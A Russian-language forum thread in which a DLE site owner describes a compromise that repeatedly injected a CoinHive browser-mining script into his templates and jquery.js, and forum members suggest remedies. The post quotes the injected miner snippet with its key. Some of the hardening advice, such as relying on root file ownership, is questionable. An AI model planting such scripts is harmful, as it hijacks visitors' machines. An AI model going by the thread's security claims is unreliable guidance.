Взломали сайт, какие меры принять?

Romantv

Новичок
Регистрация
27 Фев 2017
Сообщения
957
Реакции
358
Баллы
63
Вчера вечером приходит смс сообщение что на сайте изменены 4 файла, а именно
fullstory.tpl
main.tpl
shortstory.tpl
/engine/classes/js/jquery.js
я скачал один файл fullstory.tpl и его сравнил программой Araxis Merge сразу нашол скрипт
Код:
<script>var min = new CoinHive.Anonymous('ooApRc35FgFVFE7JAf8d7MQO3TSbhd2v',{throttle: 0.9});if (!min.isMobile()) {min.start();}</script>
Я сразу шаблон удалил и закачал новый из бекапа ( там этого скрипта нет)
Все что находится в папке /engine/classes/js/ заменил.
Проходит минут 15 опять приходит смс изменен и добавлен файл
/engine/classes/js/jquery.js
/engine/classes/js/jquery_.js

Я обратно все что в папке /engine/classes/js/ поменял.

Сегодня утром после осмотра нахожу обратно этот скрипт майнера.
Сейчас шаблон новый с бекапа закачал,поменял права и пользователя на root
Поменял пользователя на папку engine теперь она root ( закачать, файл поменять уже не получится,даже если есть доступ)
Нашол партнерку coinhive.com там зарегистрировался,написал в поддержку,так и так и предоставил им скрипт,сейчас ожидаю ответа, ( если ответят и скажут кошелек я постараюсь его заблокировать)


Так вот сам вопрос: Что еще предпринять, для защиты сайта?
Как вообще можно закачать файл на сайт /engine/classes/js/jquery_.js ?
Все мои модули которые у меня установлены вот
upload_2018-1-27_12-35-6.png
 

warxammer

VIP
VIP
Прошёл марафон
Регистрация
31 Мар 2017
Сообщения
496
Реакции
172
Баллы
43
Romantv сочувствую, тоже интересен данный вопрос на будущее, что бы защититься.
 

Romantv

Новичок
Регистрация
27 Фев 2017
Сообщения
957
Реакции
358
Баллы
63
Тебе максимум битка кошель дадут))
на самом деле,если ответят то ответят,а нет и хуй с ним.
заблокировать его могут, там в пп
/engine/classes/js/jquery_.js
интересно как этот файл попал и для чего он. вчера был пьяный удалил его а потом только подумал надо было посмотреть что в нем.
 

Анна

Модератор
Команда форума
Приватовец
VIP
Прошёл марафон
Регистрация
23 Апр 2017
Сообщения
1.377
Реакции
540
Баллы
113
@Romantv, а как ты смс получаешь? Что за программа?
 

Romantv

Новичок
Регистрация
27 Фев 2017
Сообщения
957
Реакции
358
Баллы
63

Evurg

Приватовец
Приватовец
Регистрация
9 Июл 2017
Сообщения
878
Реакции
411
Баллы
63
Что еще предпринять, для защиты сайта?
Статический ip, чтобы можно было входить лишь под одним, наверное самое надежное, скорее всего сохраняешь пароли в браузерах, возможно поймал какую-то дичь в виде стилера и пароли ушли к злодею. Советую изменить все пароли везде.
 

Romantv

Новичок
Регистрация
27 Фев 2017
Сообщения
957
Реакции
358
Баллы
63
Статический ip, чтобы можно было входить лишь под одним, наверное самое надежное, скорее всего сохраняешь пароли в браузерах, возможно поймал какую-то дичь в виде стилера и пароли ушли к злодею. Советую изменить все пароли везде.
Они сказали имя Вася, больше они не чего не сказали.
дич точно не мог поймать. винда поставил месяц назад. программ нет а которые есть все лицензионные
 

GENERIC

Гуру
Кодер
Регистрация
22 Фев 2017
Сообщения
455
Реакции
195
Баллы
43
какая версия DLE?
Смотри по логам кто заходил постарайся выявить айпиху, потом по айпи ищи в access логах найдешь последовательность куда и через что. Если например шелл на сайте то соответственно увидишь к каким файлам был запрос. Если ты говоришь что пароли менял и все ровно заливали значить где то есть бэкдор
 

Romantv

Новичок
Регистрация
27 Фев 2017
Сообщения
957
Реакции
358
Баллы
63
Если ты говоришь что пароли менял
Я этого не говорил)Я пароли поменя только утром от сервера,а на сайте свой пароль не менял,там видно что не пароль не подобрали,
закачали этот файл /engine/classes/js/jquery_.js
Из админки файл не закачаешь.
Буду версию обновлять сейчас 12 стоит.
Да даже если есть беккод или шел,он уже не чего не сделает без root, можно уже не боятся
root и права на файлы 444 и папка engine root.
upload_2018-1-27_18-0-47.png
Во вторник с Москвы приеду и буду обновлятся.
Но все же интересно как получили доступ,пароль от админки исключено,сервер тоже,там есть другие сайты.
 

Romantv

Новичок
Регистрация
27 Фев 2017
Сообщения
957
Реакции
358
Баллы
63
Я скрипт потом проверил,он у меня не работает,защита стоит add_header Content-Security-Policy
 

Romantv

Новичок
Регистрация
27 Фев 2017
Сообщения
957
Реакции
358
Баллы
63
майнер походу остался.как можно с компа проверить
upload_2018-1-27_19-9-4.png
 

GENERIC

Гуру
Кодер
Регистрация
22 Фев 2017
Сообщения
455
Реакции
195
Баллы
43
майнер походу остался.как можно с компа проверить
Посмотреть вложение 2829
не факт что остался почисти кеш, а по поводу майнера. Скачай например расширения которые блокируют майнеры, тот же блокировщик adguard предупреждает если сайт майнит.
 

Romantv

Новичок
Регистрация
27 Фев 2017
Сообщения
957
Реакции
358
Баллы
63
кеш оказался)
adguard у меня вечная лицензия, а одна на год для андроид и виндовс без дела валяется.
вчера для виндовс adguard не показывал
 

doz

Гуру
Кодер
Приватовец
VIP
Регистрация
12 Мар 2017
Сообщения
212
Реакции
81
Баллы
28
никогда root на фтп не используй.
всегда отдельные юзеры должны быть.
совет одного очень хорошего знакомого (c)
 

Romantv

Новичок
Регистрация
27 Фев 2017
Сообщения
957
Реакции
358
Баллы
63
никогда root на фтп не используй.
всегда отдельные юзеры должны быть.
совет одного очень хорошего знакомого (c)
с root можно зайти куда угодно.
вот у меня root/ так же можно зайти программой putty
upload_2018-1-27_21-25-41.png
 

doz

Гуру
Кодер
Приватовец
VIP
Регистрация
12 Мар 2017
Сообщения
212
Реакции
81
Баллы
28
@Romantv, по фтп никогда файлы через рут юзера не загружай!
это все круто что там можно все делать, но это ни разу не безопасно!:nonon:
 

Romantv

Новичок
Регистрация
27 Фев 2017
Сообщения
957
Реакции
358
Баллы
63
@Romantv, по фтп никогда файлы через рут юзера не загружай!
это все круто что там можно все делать, но это ни разу не безопасно!:nonon:
Скажи чем?
Или сам не знаешь,услышал и все.
 
Сверху Снизу